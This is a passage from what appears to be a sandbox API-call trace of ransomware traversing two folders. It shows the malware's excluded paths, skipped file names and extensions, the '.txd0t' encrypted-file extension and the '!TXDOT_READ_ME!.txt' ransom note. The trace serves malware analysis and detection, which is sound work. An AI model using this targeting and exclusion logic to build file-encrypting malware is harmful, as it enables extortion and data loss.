psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\system32\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\system\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\local\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\boot\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\perflogs\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\programdata\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\drivers\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\wsus\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="crypt_detect") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="cryptolocker") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="ransomware") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\WINDOWS") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.301] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1042", lpSrch="C:\\Program Files") returned 0x0 [0116.301] GetProcessHeap () returned 0xe30000 [0116.301] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.301] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0116.302] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\*") returned="C:\\588bce7c90097ed212\\1042\\*" [0116.302] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1b30 [0116.302] StrCmpW (psz1=".", psz2=".") returned 0 [0116.302] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.302] StrCmpW (psz1="..", psz2=".") returned 1 [0116.302] StrCmpW (psz1="..", psz2="..") returned 0 [0116.302] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x584a002a, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x584a002a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x584c6483, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.302] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.302] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.302] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0116.302] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0116.302] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1042\\!TXDOT_READ_ME!.txt" [0116.302] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.302] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.302] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.302] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x584a002a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x338f, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.302] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.302] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.303] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0116.303] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0116.303] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1042\\eula.rtf.txd0t" [0116.303] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.303] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.303] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x100d6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.303] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.303] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.303] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0116.303] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0116.303] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.txd0t" [0116.303] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.303] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.303] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.303] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.303] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.303] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1042", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042") returned="C:\\588bce7c90097ed212\\1042" [0116.303] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\") returned="C:\\588bce7c90097ed212\\1042\\" [0116.303] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1042\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" [0116.303] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.303] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.303] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.304] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.304] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.304] FindNextFileW (in: hFindFile=0xec1b30, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.304] FindClose (in: hFindFile=0xec1b30 | out: hFindFile=0xec1b30) returned 1 [0116.304] GetProcessHeap () returned 0xe30000 [0116.304] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.304] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1043", cAlternateFileName="")) returned 1 [0116.304] StrCmpW (psz1="1043", psz2=".") returned 1 [0116.304] StrCmpW (psz1="1043", psz2="..") returned 1 [0116.304] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.304] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.304] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1043", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\system32\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\system\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\local\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\boot\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\perflogs\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\programdata\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\drivers\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\wsus\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="crypt_detect") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="cryptolocker") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="ransomware") returned 0x0 [0116.304] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\WINDOWS") returned 0x0 [0116.305] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.305] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\Program Files") returned 0x0 [0116.305] GetProcessHeap () returned 0xe30000 [0116.305] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.305] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0116.305] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\*") returned="C:\\588bce7c90097ed212\\1043\\*" [0116.305] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0116.305] StrCmpW (psz1=".", psz2=".") returned 0 [0116.305] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.305] StrCmpW (psz1="..", psz2=".") returned 1 [0116.305] StrCmpW (psz1="..", psz2="..") returned 0 [0116.305] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x584ec712, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x584ec712, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58512926, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0116.305] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0116.305] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0116.305] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0116.305] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0116.305] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1043\\!TXDOT_READ_ME!.txt" [0116.305] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0116.305] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0116.305] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0116.306] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0116.306] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0116.306] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x584ec712, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xfda, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0116.306] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0116.306] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0116.306] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0116.306] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0116.306] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t" [0116.306] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0116.306] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.306] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x586021aa, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13912, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0116.306] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0116.306] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0116.306] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0116.306] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0116.306] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.txd0t" [0116.306] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0116.306] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0116.306] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.306] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.306] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.306] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0116.306] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0116.306] StrNCatW (in: 